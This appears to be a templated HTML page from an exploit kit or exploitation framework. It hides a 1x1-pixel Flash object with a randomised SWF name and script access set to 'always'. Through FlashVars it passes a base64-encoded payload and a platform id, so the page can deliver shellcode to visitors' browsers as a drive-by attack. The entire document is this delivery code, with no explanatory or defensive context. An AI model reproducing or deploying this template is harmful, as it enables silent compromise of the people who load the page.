<html>
    <body>
	    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
		    <param name="movie" value="<%=swf_random%>" />
		    <param name="allowScriptAccess" value="always" />
		    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
		    <param name="Play" value="true" />
		    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
	    </object>
	</body>
</html>
